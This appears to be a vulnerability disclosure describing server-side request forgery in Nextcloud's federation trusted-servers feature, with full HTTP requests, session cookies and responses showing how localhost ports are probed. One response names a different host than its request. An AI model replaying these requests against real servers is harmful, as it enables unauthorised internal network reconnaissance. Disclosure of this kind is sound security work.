Server side request forgery (SSRF) on nextcloud implementation.

An admin of nextcloud server can add other trusted nextcloud server in his own installation. The following request passes when a new add request is processed: ```http POST /nextcloud/index.php/apps/federation/trusted-servers HTTP/1.1 Host: myown.nextcloudserver.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: GAFcYDUGGyM0CCYeIlk4b19ADhwOFgcLOy4kERdDL1Q=:AL1VmGJMGqQsVhw59y9yE/wsjGJWMtc8DJljyuFMaI4= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 27 Cookie: oc6wp9sjado5=nnofa4hfq2esn7anu70hg3c2h0; oc_sessionPassphrase=dvniWxtCrcQk4Nbt4eXXmyZu5wUk3JoHziCUaCBcmeQFaM0333bS8HBwvFOAEwF2f0cnj9gewI7OSn1ELD3IiOysU3FOj%2FkA%2BV2kZ%2FUmc9UMQTzoZpp1VSLNUJXEKQkw; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true Connection: close url=http://nextcloud.remote.server.com/ ``` This request initiates a **cURL** request to the **POST** variable. The response looks like this: ```http HTTP/1.1 400 Bad request Date: Fri, 17 Jun 2016 19:21:09 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'none';script-src 'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self' X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: Sameorigin X-Robots-Tag: none X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Content-Length: 117 Connection: close Content-Type: application/json; charset=utf-8 {"message":"Client error response [url] http:\/\/google.com\/status.php [status code] 404 [reason phrase] Not Found"} ``` **Attack Scenario** This feature can be used to launch SSRF attack to map the internal network. For example, this feature can be used to identify the internal open ports. Consider the following example: ```http POST /nextcloud/index.php/apps/federation/trusted-servers HTTP/1.1 Host: myown.nextcloudserver.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: GAFcYDUGGyM0CCYeIlk4b19ADhwOFgcLOy4kERdDL1Q=:AL1VmGJMGqQsVhw59y9yE/wsjGJWMtc8DJljyuFMaI4= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 23 Cookie: oc6wp9sjado5=nnofa4hfq2esn7anu70hg3c2h0; oc_sessionPassphrase=dvniWxtCrcQk4Nbt4eXXmyZu5wUk3JoHziCUaCBcmeQFaM0333bS8HBwvFOAEwF2f0cnj9gewI7OSn1ELD3IiOysU3FOj%2FkA%2BV2kZ%2FUmc9UMQTzoZpp1VSLNUJXEKQkw; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true Connection: close url=http://127.0.0.1:80 ``` **Response** ```json {"message":"Client error response [url] http:\/\/127.0.0.1\/status.php [status code] 404 [reason phrase] Not Found"} ``` This indicates that port **80** of the localhost is open. To check port 8080 we used **http://127.0.0.1:8080** as **POST** value and the following response was received : ```json {"message":"cURL error 7: Failed to connect to 127.0.0.1 port 8080: Connection refused"} ``` We received an error because the PORT 8080 of localhost was blocked.